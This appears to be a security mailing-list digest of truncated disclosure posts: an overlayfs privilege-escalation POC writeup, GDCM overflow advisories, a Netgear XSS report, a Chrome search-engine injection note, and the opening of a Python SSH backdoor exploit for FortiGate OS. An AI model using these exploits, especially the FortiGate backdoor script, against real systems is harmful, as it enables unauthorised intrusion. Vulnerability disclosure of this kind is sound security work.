Posted by halfdog on Jan 11

Hello List,

Preamble:

As the issue described herein was fixed 20161206 in Linux Kernel
already and publicly disclosed as security vulnerability 20151224,
here is a short writeup and POC exploit to understand the issue and
perform testing.

Description:

Linux user namespace allows to mount file systems as normal user,
including the overlayfs. As many of those features were not designed
with namespaces in mind, this increase the attack surface…

Posted by Stelios Tsampas on Jan 11

Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
images.
It provides routines to view and manipulate a wide range of image formats
and can be accessed through many popular programming languages like Python,
C#, Java and PHP.

GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
to an
integer overflow vulnerability which leads to a buffer overflow and
potentially to remote code execution. The vulnerability…

Posted by Stelios Tsampas on Jan 11

Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
images.
It provides routines to view and manipulate a wide range of image formats
and can be accessed through many popular programming languages like Python,
C#, Java and PHP.

GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone to
an out-of-bounds read vulnerability due to missing checks. The vulnerability
occurs during the decoding of JPEG-LS images when…

Posted by Black Arch on Jan 11

Dear list,

Today, we released new BlackArch Linux ISOs which include more than
1337 tools and comes with lots of improvements. The armv6h and armv7h
repositories are filled with about 1200 tools.

A short ChangeLog of the Live-ISOs:

– added more than 30 new tools
–

updated system packages and userland files (etc/)

–

included linux kernel 4.3.3

–

added bluetooth packages: bluez, bluez-firmware, bluez-hid2hci,…

Posted by gremlin on Jan 11

> Many of us have now been long aware of the possibility of
> programming an USB device to emulate a keyboard and automatically
> send keystrokes in order to perform malicious actions on a
> computer. Some of the most interesting payloads that can be used
> with this technique are based around downloading or creating an
> executable file and then running it.
> I’d like to bring to light that this attack could be…

Posted by CSW Research Lab on Jan 11

Hi,

Can you assign CVE id to this flaw?

Details
================

#Product Vendor: Netgear
#Bug Name: Cross Site Scripting in Netgear Router Version 1.0.0.24
#Software: Netgear Router Firmware
#Version: 1.0.0.24
#Last Updated: 10-06-2015
<http://kb.netgear.com/app/answers/detail/a_id/29270/~/jnr1010-firmware-version-1.0.0.24>
#Homepage: http://netgear.com/
#Severity High
#Vulnerable URL:…

Posted by operator8203 on Jan 11

#!/usr/bin/env python

# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>

import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty

def custom_handler(title, instructions, prompt_list):
n = prompt_list[0][0]
m = hashlib.sha1()
m.update(‘x00’ * 12)
m.update(n +…

Posted by metalkey net on Jan 11

Google Chrome allows execution of Javascript via the Default Search Engines
feature.
An exploit can be created to take advantage of this issue by manipulating
the master_preferences file on a victim’s machine.

Video Example:
https://www.youtube.com/watch?v=WoF-LkA6fMk

Walkthrough:
https://m3t4lk3y.wordpress.com/category/google-chrome-search-poison/